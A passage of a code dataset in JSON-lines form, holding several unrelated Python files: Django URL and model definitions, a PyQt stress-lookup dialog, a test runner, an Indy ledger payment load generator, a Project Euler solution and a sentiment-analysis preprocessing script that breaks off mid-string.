palindrome')\n","sub_path":"python/projects/reverse.py","file_name":"reverse.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"329442250","text":"from django.conf.urls import url, static\nfrom django.conf import settings\nfrom Blog import views\n\napp_name = 'Blog'\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^home/', views.blog, name='blog'),\n url(r'^blog/(?P[0-9]+)/$', views.detail, name='detail'),\n url(r'^articleFile', views.arcticleFile, name='articleFile'),\n url(r'^register',views.register,name='register'),\n]\n","sub_path":"Blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"632983170","text":"from __future__ import division\n\nimport xlrd\nfrom PyQt4.QtCore import *\nfrom PyQt4.QtGui import *\nimport ui_allowableStresses\n\nclass AllowableStresses(QDialog,ui_allowableStresses.Ui_Dialog):\n def __init__(self, parent=None):\n super(AllowableStresses,self).__init__(parent)\n self.setupUi(self)\n try:\n self.populateMatCombo()\n except:\n self.resultLabel.setText(\"Unable to open database file\")\n self.calculateButton.setDisabled(True)\n\n def populateMatCombo(self):\n self.wb = xlrd.open_workbook('Table-1A.xls')\n #self.resultLabel.setText(\"Unable to open database file\")\n self.sh = self.wb.sheet_by_index(0)\n numberOfRows=self.sh.nrows\n col = self.sh.col_values(6)\n self.matComboData=col[6:numberOfRows]\n self.materialCombo.clear()\n self.materialCombo.addItems(self.matComboData)\n\n def calculateStress(self,currentRow, temperature):\n tempRange=[-30, 65, 100, 125, 150, 200, 250, 300, 325, 350, 375, 400, 425, 450, 475, 500, 525, 550, 575, 600, 625, 650, 675, 700, 725, 750, 775, 800, 825, 850, 875, 900]\n currentMatRow=currentRow[20:52]\n for x2 in tempRange:\n if x2 >= temperature:\n i = list.index(tempRange, x2)\n break\n #print i, x2\n x1 = tempRange[i-1]\n y1 = currentMatRow[i-1]\n if y1==\"\":\n y1=0\n y2 = currentMatRow[i]\n if y2==\"\":\n y2=0\n #print tempRange\n #print currentMatRow\n #print i,x1,x2,y1,y2,len(tempRange), len(currentMatRow)\n return (temperature - x1) * (y2 - y1) / (x2 - x1) + y1\n\n @pyqtSlot()\n def on_calculateButton_clicked(self):\n try:\n self.resultLabel.clear()\n temperature=float(self.temperatureLineEdit.text())\n matIndex=self.materialCombo.currentIndex()+6\n matRow = self.sh.row_values(matIndex)\n #print matIndex,temperature, matRow\n stressValue=str(self.calculateStress(matRow,temperature))\n self.resultLabel.setText(\"Allowable Stress Value @ \" +str(temperature)+ \" 'C = \"+ stressValue +\" MPa\")\n except:\n self.resultLabel.setText(\"Invalid Input\")\n\nif __name__==\"__main__\":\n import sys\n app=QApplication(sys.argv)\n form=AllowableStresses()\n form.show()\n app.exec_()","sub_path":"Python/AllowableStresses/allowablestressesdlg.pyw","file_name":"allowablestressesdlg.pyw","file_ext":"pyw","file_size_in_byte":2383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"281206780","text":"#报表统计\n\nfrom backup.case6 import *\nfrom htmlreporter import HtmlReport\nimport configparser\nfrom runners import runner3\nfrom globalpkg.global_var import *\nfrom runners import pc_login\ntestsuitex = []\ntestsuitrul = []\n\ncookies = pc_login.cookies\n\n# 记录测试开始时间\nstart_time = datetime.datetime.now()\n\n#执行测试\n#PC-预约作废 DONE\nrunner3.runcase(testsuit6,cookies)\n#runner1.runcase(testsuit5,cookies)\n#runner1.runcase(testsuit9,cookies)\n#mobile\n#runner2.runcase(testsuitm)\n#4和6\n# 3,作业预约作废\n# 5,作业预约修改,复制和删除,影响主线执行结果\n# 6-,安全分析修改,撤回,撤回后再送交,全流程\n# 7,安全分析修改,删除\n# 8-,安全分析修改,撤回,撤回后再送交,全流程&作业任务,撤回,撤回后再送交 &作业许可证,撤回,撤回后再送交\n# 9,作业任务删除\n# runner1.runcase(testsuit3,cookies)\n# runner1.runcase(testsuit5,cookies)\n# runner1.runcase(testsuit6,cookies)\n# runner1.runcase(testsuit7,cookies)\n# runner1.runcase(testsuit8,cookies)\n# runner1.runcase(testsuit9,cookies)\n# 记录测试结束时间\nend_time = datetime.datetime.now()\n# 构造测试报告\nreport_title = 'ushayden_interface_autotest_report(%s)'%case\nhtml_report = HtmlReport('test report', report_title)\nhtml_report.set_time_took(str(end_time - start_time)) # 计算测试消耗时间\n\n# 读取测试报告路径及文件名\nconfig = configparser.ConfigParser()\nconfig.read('./config/report.conf', encoding='utf-8')\ndir_of_report = config['REPORT']['dir_of_report']\nreport_name = config['REPORT']['report_name']\n\n# 设置报告生成路\nhtml_report.mkdir_of_report(dir_of_report)\n\n# 生成测试报告\nhtml_report.generate_html(report_name)\n\nlogger.info('生成测试报告成功')\n\n# mymail = MyMail('./config/mail.conf')\n# mymail.connect()\n# mymail.login()\n# mail_content = 'Hi,附件为接口测试报告,烦请查阅'\n# mail_tiltle = '【测试报告】接口测试报告' + str(executed_history_id)\n# logger.info(html_report.get_filename())\n# attachments = set([html_report.get_filename()])\n#\n# logger.info('正在发送测试报告邮件...')\n# mymail.send_mail(mail_tiltle, mail_content, attachments)\n# mymail.quit()\n#\n# logger.info('发送邮件成功')\n# logger.info(\"-------------------------------------THE_END----------------------------------------------------------------------\")","sub_path":"useless/s6.py","file_name":"s6.py","file_ext":"py","file_size_in_byte":2385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"411479158","text":"from abc import ABCMeta\nimport json\nfrom collections import deque\nfrom ctypes import CDLL\nfrom datetime import datetime\nimport random\n\nfrom indy import payment\nfrom indy import did, ledger\n\nfrom perf_load.perf_utils import ensure_is_reply, divide_sequence_into_chunks\nfrom perf_load.perf_req_gen import NoReqDataAvailableException, RequestGenerator\n\n\nclass RGBasePayment(RequestGenerator, metaclass=ABCMeta):\n TRUSTEE_ROLE_CODE = \"0\"\n\n DEFAULT_PAYMENT_ADDRS_COUNT = 100\n\n NUMBER_OF_TRUSTEES_FOR_MINT = 4\n MINT_RECIPIENTS_LIMIT = 100\n AMOUNT_LIMIT = 100\n\n __initiated_plugins = set()\n\n @staticmethod\n def __init_plugin_once(plugin_lib_name, init_func_name):\n if (plugin_lib_name, init_func_name) not in RGBasePayment.__initiated_plugins:\n try:\n plugin_lib = CDLL(plugin_lib_name)\n init_func = getattr(plugin_lib, init_func_name)\n res = init_func()\n if res != 0:\n raise RuntimeError(\n \"Initialization function returned result code {}\".format(res))\n RGBasePayment.__initiated_plugins.add((plugin_lib_name, init_func_name))\n except Exception as ex:\n print(\"Payment plugin initialization failed: {}\".format(repr(ex)))\n raise ex\n\n def __init__(self, *args,\n payment_method,\n plugin_lib,\n plugin_init_func,\n payment_addrs_count=DEFAULT_PAYMENT_ADDRS_COUNT,\n **kwargs):\n\n super().__init__(*args, **kwargs)\n\n RGBasePayment.__init_plugin_once(plugin_lib,\n plugin_init_func)\n\n self._pool_handle = None\n self._wallet_handle = None\n self._submitter_did = None\n\n self._payment_method = payment_method\n self._payment_addrs_count = payment_addrs_count\n self._payment_addresses = []\n self._additional_trustees_dids = []\n\n async def on_pool_create(self, pool_handle, wallet_handle, submitter_did, *args, **kwargs):\n await super().on_pool_create(pool_handle, wallet_handle, submitter_did, *args, **kwargs)\n\n self._pool_handle = pool_handle\n self._wallet_handle = wallet_handle\n self._submitter_did = submitter_did\n\n await self.__ensure_submitter_is_trustee()\n\n self._additional_trustees_dids = await self.__create_additional_trustees()\n\n await self.__create_payment_addresses()\n\n for payment_addrs_chunk in divide_sequence_into_chunks(self._payment_addresses,\n RGBasePayment.MINT_RECIPIENTS_LIMIT):\n await self.__mint_sources(payment_addrs_chunk, [self._submitter_did, *self._additional_trustees_dids])\n\n async def __ensure_submitter_is_trustee(self):\n get_nym_req = await ledger.build_get_nym_request(self._submitter_did, self._submitter_did)\n get_nym_resp = await ledger.sign_and_submit_request(self._pool_handle,\n self._wallet_handle,\n self._submitter_did,\n get_nym_req)\n get_nym_resp_obj = json.loads(get_nym_resp)\n ensure_is_reply(get_nym_resp_obj)\n res_data = json.loads(get_nym_resp_obj[\"result\"][\"data\"])\n if res_data[\"role\"] != RGBasePayment.TRUSTEE_ROLE_CODE:\n raise Exception(\"Submitter role must be TRUSTEE since \"\n \"submitter have to create additional trustees to mint sources.\")\n\n async def __create_additional_trustees(self):\n trustee_dids = []\n\n for i in range(RGBasePayment.NUMBER_OF_TRUSTEES_FOR_MINT - 1):\n tr_seed = \"Trustee{}\".format(2 + i)\n tr_seed = \"{}{}\".format(tr_seed, \"0\" * (32 - len(tr_seed)))\n tr_did, tr_verkey = await did.create_and_store_my_did(self._wallet_handle, json.dumps({'seed': tr_seed}))\n\n nym_req = await ledger.build_nym_request(self._submitter_did, tr_did, tr_verkey, None, \"TRUSTEE\")\n await ledger.sign_and_submit_request(self._pool_handle, self._wallet_handle, self._submitter_did, nym_req)\n\n # nym_resp = await ledger.sign_and_submit_request(self._pool_handle, self._wallet_handle, self._submitter_did, nym_req)\n # ensure_is_reply(nym_resp)\n\n trustee_dids.append(tr_did)\n\n return trustee_dids\n\n async def __create_payment_addresses(self):\n for i in range(self._payment_addrs_count):\n self._payment_addresses.append(\n await payment.create_payment_address(self._wallet_handle, self._payment_method, \"{}\"))\n\n async def __mint_sources(self, payment_addresses, trustees_dids):\n outputs = []\n for payment_address in payment_addresses:\n outputs.append({\"recipient\": payment_address, \"amount\": random.randint(1, RGBasePayment.AMOUNT_LIMIT)})\n\n mint_req, _ = await payment.build_mint_req(self._wallet_handle,\n self._submitter_did,\n json.dumps(outputs),\n None)\n\n for trustee_did in trustees_dids:\n mint_req = await ledger.multi_sign_request(self._wallet_handle, trustee_did, mint_req)\n\n mint_resp = await ledger.submit_request(self._pool_handle, mint_req)\n ensure_is_reply(mint_resp)\n\n async def _get_payment_sources(self, payment_address):\n get_payment_sources_req, _ = \\\n await payment.build_get_payment_sources_request(self._wallet_handle,\n self._submitter_did,\n payment_address)\n get_payment_sources_resp = \\\n await ledger.sign_and_submit_request(self._pool_handle,\n self._wallet_handle,\n self._submitter_did,\n get_payment_sources_req)\n ensure_is_reply(get_payment_sources_resp)\n\n source_infos_json = \\\n await payment.parse_get_payment_sources_response(self._payment_method,\n get_payment_sources_resp)\n source_infos = json.loads(source_infos_json)\n payment_sources = []\n for source_info in source_infos:\n payment_sources.append((source_info[\"source\"], source_info[\"amount\"]))\n return payment_sources\n\n\nclass RGGetPaymentSources(RGBasePayment):\n def _gen_req_data(self):\n return (datetime.now().isoformat(), random.choice(self._payment_addresses))\n\n async def _gen_req(self, submit_did, req_data):\n _, payment_address = req_data\n req, _ = await payment.build_get_payment_sources_request(self._wallet_handle,\n self._submitter_did,\n payment_address)\n return req\n\n\nclass RGPayment(RGBasePayment):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self._sources_amounts = deque()\n self.__req_id_to_source_amount = {}\n self._old_reqs = set()\n\n async def on_pool_create(self, pool_handle, wallet_handle, submitter_did, *args, **kwargs):\n await super().on_pool_create(pool_handle, wallet_handle, submitter_did, *args, **kwargs)\n await self.__retrieve_minted_sources()\n\n async def __retrieve_minted_sources(self):\n for payment_address in self._payment_addresses:\n self._sources_amounts.extend(await self._get_payment_sources(payment_address))\n\n def _gen_req_data(self):\n if len(self._sources_amounts) == 0:\n raise NoReqDataAvailableException()\n\n source, amount = self._sources_amounts.popleft()\n address = random.choice(self._payment_addresses)\n\n inputs = [source]\n outputs = [{\"recipient\": address, \"amount\": amount}]\n\n return inputs, outputs\n\n async def _gen_req(self, submit_did, req_data):\n inputs, outputs = req_data\n req, _ = await payment.build_payment_req(self._wallet_handle,\n self._submitter_did,\n json.dumps(inputs),\n json.dumps(outputs),\n None)\n\n req_obj = json.loads(req)\n req_id = req_obj[\"reqId\"]\n source = inputs[0]\n amount = outputs[0][\"amount\"]\n self.__req_id_to_source_amount[req_id] = source, amount\n\n self._old_reqs.add(req_id)\n\n return req\n\n async def on_request_replied(self, req_data, req, resp_or_exp):\n req_obj = json.loads(req)\n req_id = req_obj.get(\"reqId\", None)\n if req_id not in self._old_reqs:\n return\n self._old_reqs.remove(req_id)\n\n if isinstance(resp_or_exp, Exception):\n return\n\n resp = resp_or_exp\n\n try:\n source, amount = self.__req_id_to_source_amount.pop(req_id)\n\n resp_obj = json.loads(resp)\n\n if \"op\" not in resp_obj:\n raise Exception(\"Response does not contain op field.\")\n\n if resp_obj[\"op\"] == \"REQNACK\" or resp_obj[\"op\"] == \"REJECT\":\n self._sources_amounts.append((source, amount))\n elif resp_obj[\"op\"] == \"REPLY\":\n receipt_infos_json = await payment.parse_payment_response(self._payment_method, resp)\n receipt_infos = json.loads(receipt_infos_json)\n receipt_info = receipt_infos[0]\n self._sources_amounts.append((receipt_info[\"receipt\"], receipt_info[\"amount\"]))\n\n except Exception as e:\n print(\"Error on payment txn postprocessing: {}\".format(e))\n\n\nclass RGVerifyPayment(RGBasePayment):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self._sources_amounts = []\n self._receipts = []\n\n async def on_pool_create(self, pool_handle, wallet_handle, submitter_did, *args, **kwargs):\n await super().on_pool_create(pool_handle, wallet_handle, submitter_did, *args, **kwargs)\n await self.__retrieve_minted_sources()\n await self.__perform_payments()\n\n async def __retrieve_minted_sources(self):\n for payment_address in self._payment_addresses:\n self._sources_amounts.extend(await self._get_payment_sources(payment_address))\n\n async def __perform_payments(self):\n for source, amount in self._sources_amounts:\n address = random.choice(self._payment_addresses)\n\n inputs = [source]\n outputs = [{\"recipient\": address, \"amount\": amount}]\n\n payment_req, _ = await payment.build_payment_req(self._wallet_handle,\n self._submitter_did,\n json.dumps(inputs),\n json.dumps(outputs),\n None)\n\n payment_resp = await ledger.sign_and_submit_request(self._pool_handle,\n self._wallet_handle,\n self._submitter_did,\n payment_req)\n ensure_is_reply(payment_resp)\n\n receipt_infos_json = await payment.parse_payment_response(self._payment_method, payment_resp)\n receipt_infos = json.loads(receipt_infos_json)\n receipt_info = receipt_infos[0]\n\n self._receipts.append(receipt_info[\"receipt\"])\n\n def _gen_req_data(self):\n return (datetime.now().isoformat(), random.choice(self._receipts))\n\n async def _gen_req(self, submit_did, req_data):\n _, receipt = req_data\n req, _ = await payment.build_verify_payment_req(self._wallet_handle,\n self._submitter_did,\n receipt)\n return req\n","sub_path":"scripts/performance/perf_load/perf_req_gen_payment.py","file_name":"perf_req_gen_payment.py","file_ext":"py","file_size_in_byte":12460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"441590198","text":"# importing necessery django classes \nfrom django.contrib.auth.models import User\nfrom django.utils import timezone \nfrom django.db import models \nfrom django.urls import reverse\nfrom django.db.models.signals import post_save, pre_save\nfrom django.dispatch import receiver\nfrom django.contrib.auth.models import Group\n \nclass myUser(models.Model):\n\n GROUPS = (\n ('Parent', 'Parent'),\n ('Child', 'Child'),\n ('External', 'External'),\n )\n\n user = models.OneToOneField(User, null = True, on_delete = models.CASCADE)\n name = models.CharField(max_length = 200, null = True)\n email = models.CharField(max_length = 200, null = True)\n phone = models.CharField(max_length = 200, null = True)\n group = models.CharField(max_length = 200, null = True, choices = GROUPS)\n profile_picture = models.ImageField(default = \"avatars/profile1.png\", upload_to = 'avatars', null = True, blank = True)\n date_created = models.DateTimeField(auto_now_add = True, null = True)\n\n def __str__(self):\n return str(self.name)\n\nclass Image(models.Model):\n title = models.CharField(max_length = 200, null = True)\n description = models.CharField(max_length = 200, null = True)\n image = models.ImageField(upload_to='images', null = True)\n\n def __str__(self):\n return self.title\n\nclass ImageComment(models.Model):\n author = models.ForeignKey(myUser, default = 1, on_delete = models.CASCADE)\n image = models.ForeignKey(Image, default = 1, on_delete = models.CASCADE)\n text = models.TextField(null = True)\n date_created = models.DateTimeField(auto_now_add = True, null = True)\n\n def __str__(self):\n return self.text\n\n@receiver(post_save, sender = User)\ndef create_profile(sender, instance, created, **kwargs):\n if created:\n myUser.objects.create(user = instance)\n group = Group.objects.get(name = 'Basic user')\n instance.groups.add(group)\n\npost_save.connect(create_profile, sender = User)\n\nclass Child_Item(models.Model):\n CATEGORY = (\n ('To read', 'To read'),\n ('To watch', 'To watch'),\n ('To buy', 'To buy'),\n ('To do', 'To do'),\n )\n\n STATUS = (\n ('Task done', 'Task done'),\n ('Task not done yet', 'Task not done yet'),\n )\n\n owner = models.ForeignKey(myUser, null = True, default = None, on_delete = models.CASCADE)\n name = models.CharField(max_length = 200, null = True)\n description = models.CharField(max_length = 200, null = True)\n category = models.CharField(max_length = 200, null = True, choices = CATEGORY)\n status = models.CharField(max_length = 200, null = True, choices = STATUS)\n\n def __str__(self):\n return self.name\n\nclass Personal_Event(models.Model):\n STATUS = (\n ('Task done', 'Task done'),\n ('Task not done yet', 'Task not done yet'),\n )\n\n person = models.ForeignKey(myUser, null = True, default = None, on_delete = models.CASCADE)\n task = models.CharField(max_length = 200, null = True)\n description = models.CharField(max_length = 200, null = True)\n start_time = models.DateTimeField(null = True)\n end_time = models.DateTimeField(null = True)\n status = models.CharField(max_length = 200, null = True, choices = STATUS, default = 'Task not done yet')\n\n def __str__(self):\n return self.task\n\nclass Measurement(models.Model):\n\n CATEGORY = (\n ('Approved', 'Approved'),\n ('Awaiting approval', 'Awaiting approval'),\n )\n\n location = models.CharField(max_length=200)\n destination = models.CharField(max_length=200)\n distance = models.DecimalField(max_digits=10, decimal_places=2)\n created = models.DateTimeField(auto_now_add=True)\n start_time = models.DateTimeField(null = True)\n end_time = models.DateTimeField(null = True)\n\n votes = models.ManyToManyField(User, related_name = 'trip_vote')\n status = models.CharField(max_length = 200, null = True, choices = CATEGORY, default = 'Awaiting approval')\n \n\n def total_votes(self):\n return self.likes.count()\n\n\n def __str__(self):\n return f\"Distance from {self.location} to {self.destination} is {self.distance} km\"\n\nclass Event(models.Model):\n\n CATEGORY = (\n ('Urgent', 'Urgent'),\n ('Important', 'Important'),\n ('Can be delayed', 'Can be delayed'),\n ('Unimportant', 'Unimportant'),\n )\n\n title = models.CharField(max_length=200, null=True)\n person_in_charge = models.ForeignKey(myUser, null = True, default = None, on_delete = models.CASCADE)\n description = models.TextField(null=True)\n start_time = models.DateTimeField(null=True)\n end_time = models.DateTimeField(null=True)\n importance = models.CharField(max_length=200, null=True, choices = CATEGORY)\n\n @property\n def get_html_url(self):\n url = reverse('event_edit', args=(self.id,))\n if self.importance == \"Important\":\n return f' {self.title} - {self.person_in_charge.name}'\n if self.importance == \"Urgent\":\n return f' {self.title} - {self.person_in_charge.name}'\n if self.importance == \"Can be delayed\":\n return f' {self.title} - {self.person_in_charge.name}'\n if self.importance == \"Unimportant\":\n return f' {self.title} - {self.person_in_charge.name}'\n","sub_path":"sources/mysite/family_assistant/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"274792748","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Oct 15 13:26:59 2015\n\n@author: jack.gang\n\"\"\"\n\nimport time \nfrom EulerFunctions import isPrime\n\nstart = time.clock()\n\nnum = 3 # starting number after middle\nsize = 1000000\ndiagonalNumIsPrime = []\nincrement = 2\n# doesn't matter which way it spirals\nfor n in range(3,size+1,2):\n for i in range(0,4):\n diagNum = (num + increment*i)\n diagonalNumIsPrime.append(isPrime(diagNum))\n if (n+1) < size:\n num = num + increment*4 + 2\n increment += 2\n # need to add 1 for \"1\" in middle of diagonals\n if sum(diagonalNumIsPrime) / (len(diagonalNumIsPrime)+1) < 0.10:\n break\n\nanswer = n\n \nelapsed = time.clock() - start\n\nprint(\"{} found in {} seconds\".format(answer,elapsed))\n","sub_path":"058 - Spiral primes.py","file_name":"058 - Spiral primes.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"451216933","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Dec 28 19:06:18 2020\n\n@author: shahzeb\n\nIDE: Spyder(Python3.8)\n\"\"\"\n\"\"\" \nIntroduction: From the problem statement the required is as follows: F1-Score and Accuracy score\nfor the given sentiment_analysis.txt. The file contains column0 which has corpus sentences and \ncolumn1 which has the emotion for 0:Negative and 1:Positive.\n\nThe given dataset is in the form of Labeled data, hence supervised learning is obvious for data. And\npre-processing the data implementing Classification Algorithms is a good way to train\nand test models for this paticular dataset.\n\nSteps followed in this code assignment:\n \n A) Pre-Processing:\n \n 1) Tokenizing: The dataset is tokenized with 3 different tokenizers. Namely, Word_tokenizer,\n Treebank_tokenizer and Regexp_tokenizer. And after that pre-processing step-2,3,4 are applied to\n all the 3 tokenizers. \n 2) Removing the Stop words.\n 3) POS Tagging: It's resonable to do POS tagging after removing stop words as it'll remove\n unimportant words, thus we have to process only important words: saving time and computation power.\n 4) After that lemmatization(WordNetLemmatizer is used in this assignment) is chosen over \n stemmitization as it'll give the root word for any given word in the'\n \n 5)Data Cleaning: Numbers,Hyphens,quotation marks,new line characters,apostrophes,etc \n are removed from the txt.\n \n Note: I wanted to experiment with different tokenizers, lemmatizer,etc. The 3 different tokenizers \n were considered, but only 1 lemmatizer was used throughout this project as the result from the\n tokenizers were considerably similar, varying by 4-5% , So given the time constraint I \n only tried to do implement the Naive Bayers Classifier in CBOW for 3 tokenizers. And for \n remining only Treebank Tokenizer was used along with WordNetlemmatizer.\n \n \n B) Splitting Dataset/Corpus:\n The dataset/corpus is split into 66.6% of Training data and 33.3% of test data. \n Moreover, the data is shuffledeverytime the code is re-run such that different instances \n are shuffled between test and train datasets.\n C) Feature Engineering: In order to run machine learning algorithms we need to convert \n the text files into numerical feature vectors. Bag of Words (CountVectorizer()) is used\n in 1st for Naive Bayers and Random Forest Algorithms. A term-Document Matrix was constructed \n from the CountVectorizer() containing words or terms along columns and sentences along rows.\n The bag of words only considers the count of words which is not a good practice for doing sentiment analysis. \n Because some common words appear in many sentences which contain less importantnce. \n Therefore,TF-IDF is used later in this assignment for Naive Bayers and Random Forest Algorithms\n which takes into account the word based upon its uniqueness.\n \n D) Model Construction: MultiNomial Naive Bayers was constructed from sklearn.model_selection\n library and Random Forest Classifier was constructed from sklearn.ensemble.\n E) Evaluation: The accuracy_score, F1-scores are printed into the console.As well as confusion matrix is also calculated.\n\n\"\"\"\n#import nltk\n#nltk.download()\n\n# importing necessary libraries \nimport re\nimport nltk\nimport warnings \nfrom nltk.tokenize import RegexpTokenizer,word_tokenize,TreebankWordTokenizer\n\nwarnings.filterwarnings(action = 'ignore') \nimport pandas as pd\nX = pd.read_csv('sentiment_analysis.txt', sep=\"\\t\", header=None)\ntarget=X[1]\n#taking the output into target variable\n#To print the corpus from the dataset\n#corpus=X[0]\n#for line in corpus:\n# print(line)\n\n#importing stopwords library to later remove the stop words from our corpus\nfrom nltk.corpus import stopwords\nstop_words = set(stopwords.words('english'))\n\nfrom nltk.stem import WordNetLemmatizer #WordLemmatizer is used to cut down the word back to it's root word\nfrom nltk.corpus import wordnet #wordnet is a lexical database for the English language, we'll use it to find POS tags for words\nlemmatizer = WordNetLemmatizer() # creating instance of class WordNetLemmatizer\n\nprint(\"The corpus dataset, Column 0: is for Sentence Corpus and Column 1: is for emotions. For 0 value in Column 1 it's negative sentiment for the sentence and for value 1 its positive sentiment\")\nX\n # (A) PRE-PROCESSING\n#The function below converts nltk tag to wordnet tags for POS tagging.\ndef nltk_tag_to_wordnet_tag(nltk_tag):\n if nltk_tag.startswith('J'):\n return wordnet.ADJ\n elif nltk_tag.startswith('V'):\n return wordnet.VERB\n elif nltk_tag.startswith('N'):\n return wordnet.NOUN\n elif nltk_tag.startswith('R'):\n return wordnet.ADV\n else: \n return None\n\n# The function below is used for tokenization followed by removing stop words, POS Tagging words, Lemmatization. This function is for Wordtokenizer only.\ndef Wordtoken_lemmatize_sentence(sentence):\n \n tokenizer_word= word_tokenize(str(sentence)) #Tokenize the sentence \n filtered_sentence = ' '.join([w for w in tokenizer_word if not w in stop_words]) #After tokenizing find the POS tag for each token\n nltk_tagged = nltk.pos_tag(nltk.word_tokenize(filtered_sentence)) #nltk_tagged contains the POS tag that will be used by lemmatizer to effectively find root words\n #tuple of (token, wordnet_tag)\n wordnet_tagged = map(lambda x: (x[0], nltk_tag_to_wordnet_tag(x[1])), nltk_tagged)\n lemmatized_sentence = []\n for word, tag in wordnet_tagged:\n if tag is None:\n #If no available POS tag then append the token as it is.\n lemmatized_sentence.append(word)\n else: \n #Else use the POS tag to lemmatize the token\n lemmatized_sentence.append(lemmatizer.lemmatize(word, tag).lower()) #appending the words to sentances\n return \" \".join(lemmatized_sentence) #returning the lematized sentance\n\nX['Wordtoken_cleaned_txt']=X[0].apply(Wordtoken_lemmatize_sentence) #calling the above function(Wordtoken_lemmatize_sentence) and stores the values to X dataset in a new column named as Wordtoken_cleaned_txt.\n\nX\n# The function below is used for tokenization followed by removing stop words, POS Tagging words, Lemmatization. This function is for TreeBank Tokenizer only.\ndef Treetoken_lemmatize_sentence(sentence):\n treebank_tokenizer= TreebankWordTokenizer().tokenize(str(sentence)) #Tokenize the sentence \n filtered_sentence = ' '.join([w for w in treebank_tokenizer if not w in stop_words]) #After tokenizing find the POS tag for each token\n nltk_tagged = nltk.pos_tag(nltk.word_tokenize(filtered_sentence)) #nltk_tagged contains the POS tag that will be used by lemmatizer to effectively find root words\n wordnet_tagged = map(lambda x: (x[0], nltk_tag_to_wordnet_tag(x[1])), nltk_tagged)\n lemmatized_sentence = []\n for word, tag in wordnet_tagged:\n if tag is None:\n #If no available POS tag then append the token as it is.\n lemmatized_sentence.append(word)\n else: \n #Else use the POS tag to lemmatize the token\n lemmatized_sentence.append(lemmatizer.lemmatize(word, tag).lower()) #appending the words to sentances\n return \" \".join(lemmatized_sentence) #returning the lematized sentance\n\nX['TreeToken_cleaned_txt']=X[0].apply(Treetoken_lemmatize_sentence) #calling the above function(Treetoken_lemmatize_sentence) and stores the values to X dataset in a new column named as TreeToken_cleaned_txt.\n\nRegtokenizer = RegexpTokenizer('\\w+|\\$[\\d\\.]+|\\S+')\n\n# The function below is used for tokenization followed by removing stop words, POS Tagging words, Lemmatization. This function is for RegExp Tokenizer only.\ndef Regextoken_lemmatize_sentence(sentence):\n #tokenize the sentence and find the POS tag for each token\n regex_token=Regtokenizer.tokenize(str(sentence.lower())) #Tokenize the sentence \n filtered_sentence = ' '.join([w for w in regex_token if not w in stop_words]) #After tokenizing find the POS tag for each token\n nltk_tagged = nltk.pos_tag(nltk.word_tokenize(filtered_sentence)) #nltk_tagged contains the POS tag that will be used by lemmatizer to effectively find root words\n wordnet_tagged = map(lambda x: (x[0], nltk_tag_to_wordnet_tag(x[1])), nltk_tagged)\n lemmatized_sentence = []\n for word, tag in wordnet_tagged:\n if tag is None:\n #If no available POS tag then append the token as it is.\n lemmatized_sentence.append(word)\n else: \n #Else use the POS tag to lemmatize the token\n lemmatized_sentence.append(lemmatizer.lemmatize(word, tag).lower())\n return \" \".join(lemmatized_sentence) #returning the lematized sentance\n\n\nX['Regtoken_cleaned_txt']=X[0].apply(Regextoken_lemmatize_sentence) #calling the above function(Regextoken_lemmatize_sentence) and stores the values to X dataset in a new column named as Regtoken_cleaned_txt.\n\nX\n#print(\"The Dataset after applying the tokenizers, POS tagging, removing stop words and Lematizing\", X)\nprint(\"------------------\"*10)\n\n'''\n#The function cleantxt() as represented below makes sure only character from a-z \n#and A-Z are present and remaining ones are removed from the pre-processed dataset. \n#We apply this to all the 3 cleaned columns in the dataset X for each of the tokenizer used.'''\n\ndef cleantext(retext):\n return re.sub('[^a-zA-Z]',' ',str(retext))#.lower()\nX['TreeToken_cleaned_txt']=X['TreeToken_cleaned_txt'].apply(cleantext)\nX['Regtoken_cleaned_txt']=X['Regtoken_cleaned_txt'].apply(cleantext)\nX['Wordtoken_cleaned_txt']=X['Wordtoken_cleaned_txt'].apply(cleantext)\n#X_test['cleanedtxt']=X_test['Regtokenizedtxt'].apply(cleantext)\n#The function removechar() as represented below removes the new line character if any present,\n# if any apostrophes,hyphens,quotation marks,etc.\ndef removechar(text):\n text = re.sub('[0-9]+.\\t','',str(text))\n # removing new line characters\n text = re.sub('\\n ','',str(text))\n text = re.sub('\\n',' ',str(text))\n # removing apostrophes\n text = re.sub(\"'s\",'',str(text))\n # removing hyphens\n text = re.sub(\"-\",' ',str(text))\n text = re.sub(\"— \",'',str(text))\n # removing quotation marks\n text = re.sub('\\\"','',str(text))\n # removing any reference to outside text\n text = re.sub(\"[\\(\\[].*?[\\)\\]]\", \"\", str(text))\n return text\n \n#The below removechar is called for all the 3 columns in X dataset.\nX['TreeToken_cleaned_txt']=X['TreeToken_cleaned_txt'].apply(removechar)\nX['Regtoken_cleaned_txt']=X['Regtoken_cleaned_txt'].apply(removechar)\nX['Wordtoken_cleaned_txt']=X['Wordtoken_cleaned_txt'].apply(removechar)\n\n'''\n (B) Splitting Dataset/Corpus:\n #The dataset is split into 33.3% for test and 66.6%. This is taken randomly \n any other split for test and train data is possible.\n'''\n\nfrom sklearn.model_selection import train_test_split\n\nX_train, X_test, y_train, y_test = train_test_split(X['TreeToken_cleaned_txt'], target, test_size=0.33) #test and train data split for the data to which treebank token is applied\nX_train2, X_test2, y_train2, y_test2 = train_test_split(X['Regtoken_cleaned_txt'], target, test_size=0.33) #test and train data split for the data to which Regextoken is applied\nX_train3, X_test3, y_train3, y_test3 = train_test_split(X['Wordtoken_cleaned_txt'], target, test_size=0.33) #test and train data split for the data to which wordtoken is applied\nprint(\" The dataset is split as: For Training 